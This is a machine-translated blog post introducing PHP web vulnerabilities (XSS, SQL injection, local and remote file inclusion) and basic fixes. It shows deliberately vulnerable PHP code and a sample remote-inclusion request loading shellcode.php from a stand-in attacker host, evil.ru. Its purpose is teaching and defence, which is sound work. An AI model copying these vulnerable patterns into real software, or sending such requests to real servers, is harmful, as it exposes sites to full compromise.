Web application security

Introduction.

While developing my site in php, I began to think about its security. Web security. I would not want one morning to see the inscription “Hacked by% hackername%” on the site on a white background, or that the entire contents of my site, including the engine, which took a long time to write, went to someone else.

A variety of web vulnerabilities.
So, I began to be interested in vulnerabilities and, of course, in ways to eliminate them.
Basically, all vulnerabilities are classified into several types:
1) XSS attack
a) Passive XSS
b) Active XSS
2) SQL injection
3) Inkludy
a) local
b) Deleted

Reconnaissance

Consider a little more each of them.

')

XSS attacks

XSS stands for Cross Site Scripting. Since the CSS abbreviation is used for Cascading Style Sheets, XSS is the abbreviation used, not CSS. This vulnerability allows you to execute malicious JavaScript code "without demand" of the user by inserting it into the html code of the site.
XSS are divided into passive and active.
Active XSS - the malicious code is stored in the database \ file and directly displayed on the vulnerable site in the browser. For example, in message headers, body posts, etc.
Passive XSS - the malicious code is transmitted by the GET \ POST parameter and displayed on the page, saving to the server does not occur.
For example:

site.ru/page.php?var=

If the var variable is not filtered in any way and is directly displayed on the page, then when entering this link, the user will see a pop-up message. Or, the attacker will receive his cookies, making a certain request.
All XSS vulnerabilities allow you to create a specific link, podbrasit administrator \ user of the site and get yourself his cookies. Such vulnerabilities were even on many large sites, such as VKontakte, for example (articles with VKontakte vulnerabilities were here, in the Habré).
Remedies: do htmlspecialchars fields, where necessary, severely filter all html tags.

SQL injections

SQL-injection (injection, injection) is a kind of vulnerability that allows you to replace and populate the original sql-question with your own data, which can lead to the output of any information, or, worse, full access to the server.
Example of vulnerable code:
...
$id=$_GET['id'];
$query="SELECT * FROM articles WHERE id='".$id."';
$ret=mysql_query($query);
...

Red and highlighted vulnerable line. If an intruder gets, for example, the $ id = 13 'value, then the quotation mark is inserted into the request, which will result in an error and allow you to output any data from the database. (I will not consider the ways out of certain motives).
Also, under some circumstances, an attacker can even execute php code, which can lead to very tragic consequences.
Ways to address the vulnerability:
1) The most important thing is to filter quotes. Everywhere - in $ _GET, $ _POST and even $ _COOKIES. For example, replace "" "with" \ '"
2) Do not use such constructions in the query: ... where id = $ id ..., but use ... where id = '$ id' with quotation marks filtered in advance.

Inclodes

Inclusion is a type of vulnerability in which it is possible to display the contents of a specific file on the server or insert the contents of a file from another server inside the site.
Local inclusions are inclusions, for which it is possible only to display the contents of any files but within this server. It can be used to get configuration files and then access the administrative panel or even the database.

Remote inclusions are vulnerabilities in which an attacker can, by a specific request, output the contents of a file from a third-party site inside the given one. With this, an attacker can insert his malicious script, for example, a shell (a script to manage all files on the server, like ftp with a web shell) and gain access to the entire server.
Example of vulnerable code:
site.ru/index.php?page=main.html
Such a harmless request will display the contents of the main.html file on the site page.
but an attacker can execute such a request: site.ru/index.php?page=http : //evil.ru/shellcode.php and get access to the entire server! This will be the remote connection. *
* this requires certain server settings.
In the absence of the necessary settings, this incloud becomes local and allows you to display the contents of any server files.
...
$page=$_GET['page'];
include ($page);
...

Total.

Of course, these are not all vulnerabilities that exist in web applications, but I considered only the most important ones, in my opinion.
I will not give living examples of sites with vulnerabilities in order to avoid trouble, but I think everything is clear.
While in the thematic blog can not publish, but I hope for your help .
Transferred to "Information Security", thank you all.
(c) I